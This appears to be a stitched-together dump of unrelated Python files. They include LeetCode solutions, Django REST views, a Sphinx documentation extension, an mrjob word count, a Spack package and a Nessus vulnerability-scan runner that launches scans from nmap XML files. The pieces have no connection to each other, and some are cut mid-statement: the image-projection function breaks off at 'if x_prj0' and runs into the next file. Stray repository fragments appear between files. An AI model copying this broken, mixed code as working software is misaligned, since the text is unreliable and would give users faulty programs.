_validate_type(argument, expected) def tuple_(argument=('immutable', 'defaults', 'are', 'ok'), expected=None): _validate_type(argument, expected) def dictionary(argument={'mutable defaults': 'are bad'}, 
expected=None): _validate_type(argument, expected) def set_(argument={'mutable', 'defaults', 'are', 'bad'}, expected=None): _validate_type(argument, expected) def frozenset_(argument=frozenset({'immutable', 'ok'}), expected=None): _validate_type(argument, expected) def unknown(argument=Unknown(), expected=None): _validate_type(argument, expected) try: exec(''' def kwonly(*, argument=0.0, expected=None): _validate_type(argument, expected) ''') except SyntaxError: pass def _validate_type(argument, expected): if isinstance(expected, unicode): expected = eval(expected) if argument != expected or type(argument) != type(expected): raise AssertionError('%r (%s) != %r (%s)' % (argument, type(argument).__name__, expected, type(expected).__name__)) import os dir = "lgg-mri-segmentation/kaggle_3m" # To call the corresponding original file def tiff_call(content): content = content.split(".")[0] + ".tif" dir_ = "_".join(content.split("_")[:4]) path = dir + "/" + dir_ + "/" + content if os.path.exists(path): return path else : return "lgg-mri-segmentation/kaggle_3m/TCGA_CS_5395_19981004/TCGA_CS_5395_19981004_12.tif" # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class Zip(MakefilePackage): """Zip is a compression and file packaging/archive utility.""" homepage = 'http://www.info-zip.org/Zip.html' url = 'http://downloads.sourceforge.net/infozip/zip30.tar.gz' version('3.0', sha256='f0e8bb1f9b7eb0b01285495a2699df3a4b766784c1765a8f1aeedf63c0806369') depends_on('bzip2') def url_for_version(self, version): return 'http://downloads.sourceforge.net/infozip/zip{0}.tar.gz'.format(version.joined) make_args = ['-f', 'unix/Makefile'] build_targets = make_args + ['generic'] @property def install_targets(self): return self.make_args + ['prefix={0}'.format(self.prefix), 'install'] tobsen2code/pyleecan from json import load as jload from os.path import join, split class ClassInfo: def __init__(self): self.class_dict = self.__init_dict__() def __init_dict__(self): """Method to get a dict on the pyleecan classes, i.e. class name, description, properties, methods, etc. 
Returns ------- class_dict : dict dict of class information """ # load the class dict path = split(__file__)[0] with open(join(path, "Class_Dict.json")) as fp: class_dict = jload(fp) # create inheritance information for cls_name in class_dict.keys(): mother_name = class_dict[cls_name]["mother"] inherit = [] while mother_name: inherit.append(mother_name) mother_name = class_dict[mother_name]["mother"] class_dict[cls_name]["inherit"] = inherit # from pprint import pprint # pprint(sorted([ClassInfo().get_prop_types()])) # complete properties and methods on each class for cls_dict in class_dict.values(): prop_names = [prop["name"] for prop in cls_dict["properties"]] for mother in cls_dict["inherit"]: mother_props = class_dict[mother]["properties"] for mother_prop in mother_props: if not mother_prop["name"] in prop_names: cls_dict["properties"].append(mother_prop) # update property names prop_names = [prop["name"] for prop in cls_dict["properties"]] # convert properties to dict cls_dict["prop_dict"] = dict() for prop in cls_dict["properties"]: cls_dict["prop_dict"][prop["name"]] = prop return class_dict def get_dict(self): return self.class_dict def get_prop_types(self): """Get a set of all defined property types of all classes.""" type_set = set() for cls in self.class_dict.values(): for prop in cls["prop_dict"].values(): type_set.add(prop["type"]) return type_set def get_base_classes(self): """Get the base classes, i.e. classes that have no mother class.""" bases = set() for key, item in self.class_dict.items(): if not item["mother"]: bases.add(key) bases = sorted(list(bases)) return bases def get_mothers(self, cls_name, stop=""): """Get a ordered list of the mothers of a class.""" mothers = [] if stop not in self.class_dict: stop = "" if cls_name in self.class_dict: mother = self.class_dict[cls_name]["mother"] while mother and cls_name != stop: mothers.append(mother) cls_name = mother mother = self.class_dict[mother]["mother"] return mothers __init__.py from .ccf import *hard/python/c0120_679_24-game/00_leetcode_0120.py # DRUNKWATER TEMPLATE(add description and prototypes) # Question Title and Description on leetcode.com # Function Declaration and Function Prototypes on leetcode.com #679. 24 Game #You have 4 cards each containing a number from 1 to 9. You need to judge whether they could operated through *, /, +, -, (, ) to get the value of 24. #Example 1: #Input: [4, 1, 8, 7] #Output: True #Explanation: (8-4) * (7-1) = 24 #Example 2: #Input: [1, 2, 1, 2] #Output: False #Note: #The division operator / represents real division, not integer division. For example, 4 / (1 - 2/3) = 12. #Every operation done is between two numbers. In particular, we cannot use - as a unary operator. For example, with [1, 1, 1, 1] as input, the expression -1 - 1 - 1 - 1 is not allowed. #You cannot concatenate numbers together. For example, if the input is [1, 2, 1, 2], we cannot write this as 12 + 12. #class Solution(object): # def judgePoint24(self, nums): # """ # :type nums: List[int] # :rtype: bool # """ # Time Is Money10-100 import numpy as np import cv2 #change the parameters to adjust distortion degree and center. 
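# --- Editor's note: hedged brute-force sketch for the LeetCode 679 "24 Game" statement
#     above; the original snippet only contains the commented-out class skeleton. ---
def judge_point24(nums):
    """Return True if the four cards can be combined with +, -, *, / to reach 24."""
    EPS = 1e-6

    def solve(values):
        if len(values) == 1:
            return abs(values[0] - 24) < EPS
        for i in range(len(values)):
            for j in range(len(values)):
                if i == j:
                    continue
                rest = [values[k] for k in range(len(values)) if k not in (i, j)]
                a, b = values[i], values[j]
                results = [a + b, a - b, a * b]
                if abs(b) > EPS:
                    results.append(a / b)  # real division, as the problem requires
                if any(solve(rest + [r]) for r in results):
                    return True
        return False

    return solve([float(n) for n in nums])

# judge_point24([4, 1, 8, 7]) -> True, e.g. (8-4) * (7-1); judge_point24([1, 2, 1, 2]) -> False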
#img: the input image, f: focal length, center_ratio: projection center(W/center_ratio_x, H/center_ratio_y) def cylind_prj(img, f, center_ratio_x=2, center_ratio_y=2): img_prj = np.zeros_like(img) fx = lambda x:f*np.arctan(x/f) fy = lambda x,y:y*np.cos(np.arctan(x/f)) rows,cols = img.shape[0], img.shape[1] shift_x = int(cols/center_ratio_x) shift_y = int(rows/center_ratio_y) for oy in range(rows): for ox in range(cols): y = oy - shift_y x = ox - shift_x y_prj = int(fy(x,y)) +shift_y x_prj = int(fx(x)) + shift_x x_img = x + shift_x y_img = y + shift_y if x_prj0 #!/usr/bin/env python # coding: utf-8 import csv from mrjob.job import MRJob from mrjob.step import MRStep class MRWordCount(MRJob): def steps(self): return [ MRStep(mapper_raw=self.mapper_raw), MRStep(mapper=self.mapper_get_title, reducer=self.reducer_get_unique), MRStep(mapper=self.mapper_clean_title, reducer=self.reducer_wdc) ] def mapper_raw(self, path, _): """Mapper reads in one row as one list and emits rows as values to pass to next mapper """ with open(path, 'r', encoding='utf-8') as file: # Read csv file using csv.reader reader = csv.reader(file, quoting=csv.QUOTE_ALL, skipinitialspace=True) # Skip header next(reader, None) # Reading in one row as one list for row in reader: yield None, row def mapper_get_title(self, _, row): """Mapper filters selected countries to study, extracts and emits title """ # List of country of interest country_list = ["Canada", "Great Britain", "United States"] # Filter country if row[6] in country_list: # Extract title title = row[2] # Emit title yield title, None def reducer_get_unique(self, title, _): """Reducer sorts title, reduces to titles only, and emits unique titles """ yield title, None def mapper_clean_title(self, title, _): """Mapper tokenizes, clean title and emits words in title with count 1 """ # Remove leading and trailing whitespace title = title.strip() # Standardize to lowercase lowercase = title.lower() # Tokenize title into single words splitting = lowercase.split() # Remove punctuations and numbers words = [w for w in splitting if w.isalpha()] # Assign stopwords list to variable stops stops = ["it's", "they", "with", "himself", "will", "being", "couldn't", "shouldn't", "through", "just", "i", "more", "very", "my", "its", "who", "her", "below", "t", "ve", "shouldn", "whom", "out", "to", "yourselves", "your", "has", "that'll", "mustn't", "these", "the", "over", "hasn't", "she", "in", "are", "didn", "further", "both", "now", "own", "weren't", "for", "all", "not", "should've", "how", "on", "some", "needn't", "hers", "up", "there", "him", "ll", "under", "themselves", "is", "wasn", "you've", "where", "mustn", "than", "herself", "you're", "m", "those", "doing", "was", "before", "most", "s", "and", "any", "we", "here", "wouldn", "hadn't", "of", "ourselves", "as", "did", "them", "can", "a", "ain", "only", "down", "have", "didn't", "an", "off", "other", "then", "she's", "against", "re", "having", "yours", "same", "ma", "theirs", "by", "his", "while", "such", "what", "mightn't", "during", "this", "each", "yourself", "which", "myself", "hasn", "were", "why", "into", "above", "won't", "haven", "their", "until", "it", "or", "if", "be", "aren't", "after", "about", "d", "couldn", "shan", "o", "doesn't", "haven't", "at", "between", "so", "been", "me", "nor", "won", "don", "isn't", "do", "should", "few", "you'd", "ours", "does", "he", "no", "you", "shan't", "once", "wouldn't", "wasn't", "don't", "our", "am", "but", "because", "you'll", "from", "doesn", "isn", "too", "weren", "needn", "y", 
"itself", "when", "aren", "again", "had", "hadn", "mightn", "that"] # Remove stopwords words1 = [w for w in words if not w in stops] # Remove words with less than 2 characters words2 = [w for w in words1 if (len(w) > 2) is True] # Emit each word in the list with count of 1 for word in words2: yield word, 1 def reducer_wdc(self, word, counts): """Reducer counts words occurrence""" yield word, sum(counts) if __name__ == '__main__': MRWordCount.run()xrojan/lrthub-core # Created by on 07/07/2018 # @email from rest_framework.response import Response from ..models import Rating from . import serializers from rest_framework import generics, status from rest_framework.permissions import IsAuthenticated class RatingList(generics.ListAPIView): permission_classes = (IsAuthenticated,) queryset = Rating.objects.all() serializer_class = serializers.RatingSerializer class RatingCreate(generics.CreateAPIView): queryset = Rating.objects.all() serializer_class = serializers.RatingSerializer def create(self, request, *args, **kwargs): super(RatingCreate, self).create(request, args, kwargs) response = {"status_code": status.HTTP_200_OK, "message": "Successfully created", "result": request.data} return Response(response) class RatingDetail(generics.RetrieveUpdateDestroyAPIView): permission_classes = (IsAuthenticated,) queryset = Rating.objects.all() serializer_class = serializers.RatingSerializer def retrieve(self, request, *args, **kwargs): super(RatingDetail, self).retrieve(request, args, kwargs) instance = self.get_object() serializer = self.get_serializer(instance) data = serializer.data response = {"status_code": status.HTTP_200_OK, "message": "Successfully retrieved", "result": data} return Response(response) def patch(self, request, *args, **kwargs): super(RatingDetail, self).patch(request, args, kwargs) instance = self.get_object() serializer = self.get_serializer(instance) data = serializer.data response = {"status_code": status.HTTP_200_OK, "message": "Successfully updated", "result": data} return Response(response) def delete(self, request, *args, **kwargs): super(RatingDetail, self).delete(request, args, kwargs) response = {"status_code": status.HTTP_200_OK, "message": "Successfully deleted"} return Response(response) from .core.tessagon_discovery import TessagonDiscovery # noqa: F401 1-10 from django.db import models from admin_log import middleware class AutoCreatedByField(models.ForeignKey): """ Automatically sets current admin user as object creator.""" def __init__(self, to, on_delete, **kwargs): kwargs.setdefault('default', middleware.AdminLogMiddleware.get_user_id) kwargs.setdefault('related_name', '+') kwargs.setdefault('editable', False) kwargs.setdefault('blank', True) kwargs.setdefault('null', True) super().__init__(to, on_delete, **kwargs) class AutoModifiedByField(AutoCreatedByField): """ Automatically sets current admin user as last object change author.""" def pre_save(self, model_instance, add): value = middleware.AdminLogMiddleware.get_user_id() setattr(model_instance, self.attname, value) return value # SPDX-FileCopyrightText: 2014 <> # # Based on cmake.py from CMake: # SPDX-FileCopyrightText: 2000-2013 Kitware Inc., Insight Software Consortium # # SPDX-License-Identifier: BSD-3-Clause import os import re # Monkey patch for pygments reporting an error when generator expressions are # used. 
# https://bitbucket.org/birkenfeld/pygments-main/issue/942/cmake-generator-expressions-not-handled from pygments.lexers import CMakeLexer from pygments.token import Name, Operator from pygments.lexer import bygroups CMakeLexer.tokens["args"].append(('(\\$<)(.+?)(>)', bygroups(Operator, Name.Variable, Operator))) # Monkey patch for sphinx generating invalid content for qcollectiongenerator # https://bitbucket.org/birkenfeld/sphinx/issue/1435/qthelp-builder-should-htmlescape-keywords from sphinx.util.pycompat import htmlescape from sphinx.builders.qthelp import QtHelpBuilder old_build_keywords = QtHelpBuilder.build_keywords def new_build_keywords(self, title, refs, subitems): old_items = old_build_keywords(self, title, refs, subitems) new_items = [] for item in old_items: before, rest = item.split("ref=\"", 1) ref, after = rest.split("\"") if ("<" in ref and ">" in ref): new_items.append(before + "ref=\"" + htmlescape(ref) + "\"" + after) else: new_items.append(item) return new_items QtHelpBuilder.build_keywords = new_build_keywords from docutils.parsers.rst import Directive, directives from docutils.transforms import Transform try: from docutils.utils.error_reporting import SafeString, ErrorString except ImportError: # error_reporting was not in utils before version 0.11: from docutils.error_reporting import SafeString, ErrorString from docutils import io, nodes from sphinx.directives import ObjectDescription from sphinx.domains import Domain, ObjType from sphinx.roles import XRefRole from sphinx.util.nodes import make_refnode from sphinx import addnodes class ECMModule(Directive): required_arguments = 1 optional_arguments = 0 final_argument_whitespace = True option_spec = {'encoding': directives.encoding} def __init__(self, *args, **keys): self.re_start = re.compile(r'^#\[(?P=*)\[\.rst:$') Directive.__init__(self, *args, **keys) def run(self): settings = self.state.document.settings if not settings.file_insertion_enabled: raise self.warning('"%s" directive disabled.' % self.name) env = self.state.document.settings.env rel_path, path = env.relfn2path(self.arguments[0]) path = os.path.normpath(path) encoding = self.options.get('encoding', settings.input_encoding) e_handler = settings.input_encoding_error_handler try: settings.record_dependencies.add(path) f = io.FileInput(source_path=path, encoding=encoding, error_handler=e_handler) except UnicodeEncodeError: raise self.severe('Problems with "%s" directive path:\n' 'Cannot encode input file path "%s" ' '(wrong locale?).' % (self.name, SafeString(path))) except IOError as error: raise self.severe('Problems with "%s" directive path:\n%s.' 
% (self.name, ErrorString(error))) raw_lines = f.read().splitlines() f.close() rst = None lines = [] for line in raw_lines: if rst is not None and rst != '#': # Bracket mode: check for end bracket pos = line.find(rst) if pos >= 0: if line[0] == '#': line = '' else: line = line[0:pos] rst = None else: # Line mode: check for .rst start (bracket or line) m = self.re_start.match(line) if m: rst = ']%s]' % m.group('eq') line = '' elif line == '#.rst:': rst = '#' line = '' elif rst == '#': if line == '#' or line[:2] == '# ': line = line[2:] else: rst = None line = '' elif rst is None: line = '' lines.append(line) if rst is not None and rst != '#': raise self.warning('"%s" found unclosed bracket "#[%s[.rst:" in %s' % (self.name, rst[1:-1], path)) self.state_machine.insert_input(lines, path) return [] class _ecm_index_entry: def __init__(self, desc): self.desc = desc def __call__(self, title, targetid): return ('pair', u'%s ; %s' % (self.desc, title), targetid, 'main') _ecm_index_objs = { 'manual': _ecm_index_entry('manual'), 'module': _ecm_index_entry('module'), 'find-module': _ecm_index_entry('find-module'), 'kde-module': _ecm_index_entry('kde-module'), 'toolchain': _ecm_index_entry('toolchain'), } def _ecm_object_inventory(env, document, line, objtype, targetid): inv = env.domaindata['ecm']['objects'] if targetid in inv: document.reporter.warning( 'ECM object "%s" also described in "%s".' % (targetid, env.doc2path(inv[targetid][0])), line=line) inv[targetid] = (env.docname, objtype) class ECMTransform(Transform): # Run this transform early since we insert nodes we want # treated as if they were written in the documents. default_priority = 210 def __init__(self, document, startnode): Transform.__init__(self, document, startnode) self.titles = {} def parse_title(self, docname): """Parse a document title as the first line starting in [A-Za-z0-9<] or fall back to the document basename if no such line exists. Return the title or False if the document file does not exist. """ env = self.document.settings.env title = self.titles.get(docname) if title is None: fname = os.path.join(env.srcdir, docname+'.rst') try: f = open(fname, 'r') except IOError: title = False else: for line in f: if len(line) > 0 and (line[0].isalnum() or line[0] == '<'): title = line.rstrip() break f.close() if title is None: title = os.path.basename(docname) self.titles[docname] = title return title def apply(self): env = self.document.settings.env # Treat some documents as ecm domain objects. objtype, sep, tail = env.docname.rpartition('/') make_index_entry = _ecm_index_objs.get(objtype) if make_index_entry: title = self.parse_title(env.docname) # Insert the object link target. targetid = '%s:%s' % (objtype, title) targetnode = nodes.target('', '', ids=[targetid]) self.document.insert(0, targetnode) # Insert the object index entry. 
indexnode = addnodes.index() indexnode['entries'] = [make_index_entry(title, targetid)] self.document.insert(0, indexnode) # Add to ecm domain object inventory _ecm_object_inventory(env, self.document, 1, objtype, targetid) class ECMObject(ObjectDescription): def handle_signature(self, sig, signode): # called from sphinx.directives.ObjectDescription.run() signode += addnodes.desc_name(sig, sig) return sig def add_target_and_index(self, name, sig, signode): targetid = '%s:%s' % (self.objtype, name) if targetid not in self.state.document.ids: signode['names'].append(targetid) signode['ids'].append(targetid) signode['first'] = (not self.names) self.state.document.note_explicit_target(signode) _ecm_object_inventory(self.env, self.state.document, self.lineno, self.objtype, targetid) make_index_entry = _ecm_index_objs.get(self.objtype) if make_index_entry: self.indexnode['entries'].append(make_index_entry(name, targetid)) class ECMXRefRole(XRefRole): # See sphinx.util.nodes.explicit_title_re; \x00 escapes '<'. _re = re.compile(r'^(.+?)(\s*)(?$', re.DOTALL) _re_sub = re.compile(r'^([^()\s]+)\s*\(([^()]*)\)$', re.DOTALL) def __call__(self, typ, rawtext, text, *args, **keys): # CMake cross-reference targets may contain '<' so escape # any explicit `` with '<' not preceded by whitespace. while True: m = ECMXRefRole._re.match(text) if m and len(m.group(2)) == 0: text = '%s\x00<%s>' % (m.group(1), m.group(3)) else: break return XRefRole.__call__(self, typ, rawtext, text, *args, **keys) class ECMDomain(Domain): """ECM domain.""" name = 'ecm' label = 'ECM' object_types = { 'module': ObjType('module', 'module'), 'kde-module': ObjType('kde-module', 'kde-module'), 'find-module': ObjType('find-module', 'find-module'), 'manual': ObjType('manual', 'manual'), 'toolchain': ObjType('toolchain', 'toolchain'), } directives = {} roles = { 'module': XRefRole(), 'kde-module': XRefRole(), 'find-module': XRefRole(), 'manual': XRefRole(), 'toolchain': XRefRole(), } initial_data = { 'objects': {}, # fullname -> docname, objtype } def clear_doc(self, docname): to_clear = [] for fullname, (fn, _) in self.data['objects'].items(): if fn == docname: to_clear.append(fullname) for fullname in to_clear: del self.data['objects'][fullname] def resolve_xref(self, env, fromdocname, builder, typ, target, node, contnode): targetid = '%s:%s' % (typ, target) obj = self.data['objects'].get(targetid) if obj is None: # TODO: warn somehow? return None return make_refnode(builder, fromdocname, obj[0], targetid, contnode, target) def get_objects(self): for refname, (docname, type) in self.data['objects'].items(): yield (refname, refname, type, docname, refname, 1) def setup(app): app.add_directive('ecm-module', ECMModule) app.add_transform(ECMTransform) app.add_domain(ECMDomain) scripts/nmapscan.py0 import sys import os import logging import ConfigParser import time import socket import xml.etree.ElementTree from optparse import OptionParser from logging.handlers import WatchedFileHandler from datetime import datetime from pynessus.nessus import Nessus class NessusRunner: """ NessusRunner """ def __init__(self, configfile, scans): """ :param configfile: :param scans: :return: """ self.logformat = "%s %8s %s" self.scans_running = [] # Scans currently running. self.scans_complete = [] # Scans that have completed. self.scans = scans # Scans that remain to be started. self.started = False # Flag for telling when scanning has started. 
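# --- Editor's note: hedged sketch of the nessus.conf layout this constructor expects,
#     inferred from the ConfigParser reads that follow; every value is a placeholder. ---
# [core]
# logfile = nessus_runner.log
# loglevel = info            ; one of: debug, info, warning, error, critical
# server = nessus.example.com
# port = 8834
# report_path = ./reports
# limit = 2
# sleepmax = 60
# sleepmin = 30
# user = scanner
# password = changeme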
# Parse the configuration file to set everything up self.config = ConfigParser.ConfigParser() self.config.readfp(open(configfile)) loglevels = {'debug': logging.DEBUG, 'info': logging.INFO, 'warning': logging.WARNING, 'error': logging.ERROR, 'critical': logging.CRITICAL} # Core settings self.logfile = self.config.get('core', 'logfile') self.loglevel = loglevels[self.config.get('core', 'loglevel')] # Setup some basic logging. self.logger = logging.getLogger('Nessus') self.logger.setLevel(self.loglevel) self.loghandler = WatchedFileHandler(self.logfile) self.logger.addHandler(self.loghandler) self.debug("CONF configfile = %s" % configfile) self.debug("Logger initiated; Logfile: %s, Loglevel: %s" % (self.logfile, self.loglevel)) self.server = self.config.get('core', 'server') self.port = self.config.getint('core', 'port') self.report_path = self.config.get('core', 'report_path') self.limit = self.config.getint('core', 'limit') self.sleepmax = self.config.getint('core', 'sleepmax') self.sleepmin = self.config.getint('core', 'sleepmin') self.debug("PARSED scans: %s" % self.scans) try: self.info("Nessus scanner started.") self.scanner = Nessus(self.server, self.port) self.user = self.scanner.User(self.config.get('core', 'user'), self.config.get('core', 'password')) if self.scanner.login(self.user): self.info( "Connected to Nessus server; authenticated to server '%s' as user '%s'" % (self.server, self.user.username)) self.scanner.load() else: self.error("An error occured when logging into nessus server.") except socket.error as (errno, strerror): self.error( "Socket error encountered while connecting to Nessus server: %s. User: '%s', Server: '%s', Port: %s" % ( strerror, self.user, self.server, self.port)) def start(self): """ Proxy for resume() really. Basically begins scanning with the current scanning list. """ self.started = True if len(self.scans) > 1: self.info("Starting with multiple scans") else: self.info("Starting with a single scan") if self.scans_running is None: self.scans_running = [] return self.resume() def stop(self): """ We have a start() so we most certainly should have a stop(). This should prevent scans from being continued. """ self.started = False def resume(self): """ Basically gets scans going, observing the limit. """ if self.started and len(self.scans) > 0 and len(self.scans_running) < self.limit: count = len(self.scans_running) for scan in self.scans: scan["target"] = NessusRunner.parse_nmap(scan["nmap_xml_file"]) if self.scanner.upload_file(scan["nmap_xml_file"]): self.info("%s has been uploaded." % (scan["nmap_xml_file"])) cp = None for policy in self.scanner.policies: if policy.name == scan["policy"]: cp = policy if cp is not None: p = cp.clone() if p is None: raise Exception("An error occured while copying policy.") else: p.name = "%s %s %s" % (scan["name"], scan["nmap_xml_file"], int(time.time())) prefid = None for preference in p.preferences: if "Nmap (XML file importer)" in preference.name: for value in preference.values: prefid = value.id if prefid is None: raise Exception("Nmap plugin is either not installed or misconfigured.") else: settings = { "Filedata.Nmap+(%s)." 
% (p.name.replace(" ", "+")): os.path.basename(scan["nmap_xml_file"]), "preferences.Nmap+(%s).%d" % (p.name.replace(" ", "+"), int(prefid)): os.path.basename(scan["nmap_xml_file"]), } p.settings = settings if not p.save(): raise Exception("An error occured while updating policy.") else: currentscan = self.scanner.Scan() currentscan.name = scan["name"] currentscan.custom_targets = scan["target"] currentscan.policy = p currentscan.tag = self.scanner.tags[0] if currentscan.launch(): self.info("Scan successfully started; Owner: '%s', Name: '%s'" % (currentscan.owner.name, currentscan.name)) self.scans_running.append(currentscan) self.scans.remove(scan) count += 1 if count == self.limit: self.warning("Concurrent scan limit reached (currently set at %d)" % self.limit) self.warning("Will monitor scans and continue as possible") break else: self.error("Unable to start scan. Name: '%s', Target: '%s', Policy: '%s'" % ( currentscan.name, currentscan.custom_targets, currentscan.policy.name)) else: self.error("That policy do not exist.") else: self.error("An error occured while uploading file %s" % (scan["nmap_xml_file"])) return self.scans_running def iscomplete(self): """ Check for the completion of of running scans. Also, if there are scans left to be run, resume and run them. """ for scan in self.scans_running: if scan.progress() >= 100: self.scans_complete.append(scan) self.scans_running.remove(scan) # Check to see if we're running under the limit and we have scans remaining. # If so, run more scans up to the limit and continue. if len(self.scans_running) < self.limit and len(self.scans) > 0 and self.started: self.info("We can run more scans, resuming") self.resume() elif len(self.scans_running) > 0: return False else: return True def report(self): """ Report on currently completed scans. """ for scan in self.scans_complete: report = self.scanner.Report() report.id, report.name = scan.uuid, scan.uuid path = report.download("%s/%s.%s" % (self.report_path, report.name, report.format)) if path is not None: self.info("Report for scan %s saved at %s" % (scan.name, path)) @staticmethod def parse_nmap(nmap_xml_file): targets = [] tree = xml.etree.ElementTree.parse(nmap_xml_file) root = tree.getroot() for i in root.iter("host"): targets.append(i.find("hostnames").find("hostname").get("name")) targets.append(i.find("address").get("addr")) return ",".join(targets) def close(self): """ End it. """ return self.scanner.logout() def debug(self, msg): """ @type msg: string @param msg: Debug message to be written to the log. """ self.logger.debug(self.logformat % (datetime.now(), 'DEBUG', msg)) def info(self, msg): """ @type msg: string @param msg: Info message to be written to the log. """ self.logger.info(self.logformat % (datetime.now(), 'INFO', msg)) def warning(self, msg): """ @type msg: string @param msg: Warning message to be written to the log. """ self.logger.warning(self.logformat % (datetime.now(), 'WARNING', msg)) def error(self, msg): """ @type msg: string @param msg: Error message to be written to the log. """ self.logger.info(self.logformat % (datetime.now(), 'ERROR', msg)) def critical(self, msg): """ @type msg: string @param msg: Critical message to be written to the log. 
""" self.logger.critical(self.logformat % (datetime.now(), 'CRITICAL', msg)) if __name__ == "__main__": parser = OptionParser() parser.add_option("-n", dest='name', default="No-name Auto Scan", help="name for the scan") parser.add_option("-p", dest='policy', help="policy (on server-side) to use in the scan") parser.add_option("-f", dest='infile', help="input file with multiple scans to run") parser.add_option("-c", dest='configfile', default='nessus.conf', help="configuration file to use") parser.add_option("-x", "--xml-nmap-file", dest="nmap_xml_file", help="") (options, args) = parser.parse_args() x = None if options.configfile is not None and (options.infile is not None or options.nmap_xml_file is not None): if options.infile is not None and options.nmap_xml_file is None: # Start with multiple scans. scans = [] f = open(options.infile, "r") for line in f: scan = line.strip().split(',') scans.append({'name': scan[0], 'nmap_xml_file': scan[1], 'policy': scan[2]}) x = NessusRunner(options.configfile, scans) scans = x.start() elif options.nmap_xml_file is not None and options.infile is None: # Start with a single scan. if options.name is not None and options.policy is not None: scan = [{'name': options.name, 'nmap_xml_file': options.nmap_xml_file, 'policy': options.policy}] x = NessusRunner(options.configfile, scan) scans = x.start() else: print "HARD ERROR: Incorrect usage.\n" parser.print_help() sys.exit(1) while not x.iscomplete(): time.sleep(30) x.report() x.info("All done; closing") x.close() sys.exit(0) else: parser.print_help() sys.exit(0) apopovidis/speechex # backend/apps/transcription/tests.py from django.test import TestCase # Create your tests here. # # @lc app=leetcode id=121 lang=python3 # # [121] Best Time to Buy and Sell Stock # # https://leetcode.com/problems/best-time-to-buy-and-sell-stock/description/ # # algorithms # Easy (52.31%) # Likes: 9753 # Dislikes: 399 # Total Accepted: 1.4M # Total Submissions: 2.8M # Testcase Example: '[7,1,5,3,6,4]' # # You are given an array prices where prices[i] is the price of a given stock # on the i^th day. # # You want to maximize your profit by choosing a single day to buy one stock # and choosing a different day in the future to sell that stock. # # Return the maximum profit you can achieve from this transaction. If you # cannot achieve any profit, return 0. # # # Example 1: # # # Input: prices = [7,1,5,3,6,4] # Output: 5 # Explanation: Buy on day 2 (price = 1) and sell on day 5 (price = 6), profit = # 6-1 = 5. # Note that buying on day 2 and selling on day 1 is not allowed because you # must buy before you sell. # # # Example 2: # # # Input: prices = [7,6,4,3,1] # Output: 0 # Explanation: In this case, no transactions are done and the max profit = # 0. 
# # # # Constraints: # # # 1 <= prices.length <= 10^5 # 0 <= prices[i] <= 10^4 # # # import unittest from typing import List # @lc code=start class Solution: def maxProfit(self, prices: List[int]) -> int: min_price, max_profit = prices[0], 0 for i in range(1, len(prices)): max_profit = max(max_profit, prices[i] - min_price) min_price = min(min_price, prices[i]) return max_profit # @lc code=end class SlowSolution: def maxProfit(self, prices: List[int]) -> int: n = len(prices) res = 0 for i in range(n): for j in range(i + 1, n): res = max(res, prices[j] - prices[i]) return res class TestSolution(unittest.TestCase): def setUp(self): self.s = Solution().maxProfit def test_example1(self): self.assertEqual(self.s([7, 1, 5, 3, 6, 4]), 5) def test_example2(self): self.assertEqual(self.s([7, 6, 4, 3, 1]), 0) if __name__ == "__main__": unittest.main() esaulkov/rotkehlchen import logging import random from typing import Tuple from rotkehlchen.assets.asset import Asset from rotkehlchen.constants.assets import A_BTC, A_EUR, A_USD, FIAT_CURRENCIES from rotkehlchen.exchanges.data_structures import Trade, TradeType, pair_get_assets from rotkehlchen.fval import FVal from rotkehlchen.history import PriceHistorian from rotkehlchen.typing import Timestamp, TradePair STARTING_TIMESTAMP = 1464739200 # 01/06/2016 NUMBER_OF_TRADES = 5 STARTING_FUNDS = {A_EUR: FVal(100000), A_BTC: FVal(10)} MAX_TRADE_DIFF_VARIANCE = 14400 ALLOWED_EXCHANGES = ['kraken', 'binance'] KRAKEN_PAIRS = [TradePair('ETH_EUR'), TradePair('BTC_EUR')] MAX_TRADE_USD_VALUE = FVal(100) MAX_FEE_USD_VALUE = 1 logger = logging.getLogger(__name__) class ActionWriter(object): def __init__( self, trades_number: int, seconds_between_trades: int, seconds_between_balance_save: int, rotkehlchen, fake_kraken, fake_binance, ): self.seconds_between_trades = seconds_between_trades self.seconds_between_balance_save = seconds_between_balance_save self.trades_number = trades_number self.current_ts = STARTING_TIMESTAMP self.last_trade_ts = 0 self.last_balance_save_ts = 0 self.funds = STARTING_FUNDS self.rotki = rotkehlchen self.kraken = fake_kraken self.binance = fake_binance timestamp, _, _ = self.get_next_ts() for asset, value in self.funds.items(): if asset.is_fiat(): self.rotki.data.db.add_fiat_balance(str(asset), value) self.rotki.query_balances(requested_save_data=True, timestamp=timestamp) # divide our starting funds between exchanges and keep a part out divide_by = len(ALLOWED_EXCHANGES) + 1 for asset, value in self.funds.items(): amount = value / divide_by for exchange in ALLOWED_EXCHANGES: timestamp, _, _ = self.get_next_ts() skip_exchange = asset in FIAT_CURRENCIES and exchange != 'kraken' if not skip_exchange: getattr(self, exchange).deposit( asset=asset, amount=amount, time=timestamp, ) if asset in FIAT_CURRENCIES: self.rotki.data.db.add_fiat_balance(asset, amount) self.rotki.query_balances(requested_save_data=True, timestamp=timestamp) self.last_balance_save_ts = timestamp def maybe_save_balances(self, save_ts: Timestamp) -> None: """Maybe Save all current balances in the fake user's DB at the current timestamp If the save_ts is not after the time we save balances then nothing happens """ if save_ts - self.last_balance_save_ts < self.seconds_between_balance_save: return self.rotki.query_balances(requested_save_data=True, timestamp=save_ts) self.last_balance_save_ts = save_ts def generate_history(self): created_trades = 0 while created_trades <= self.trades_number: current_ts, save_balances, make_trade = self.get_next_ts() if make_trade: 
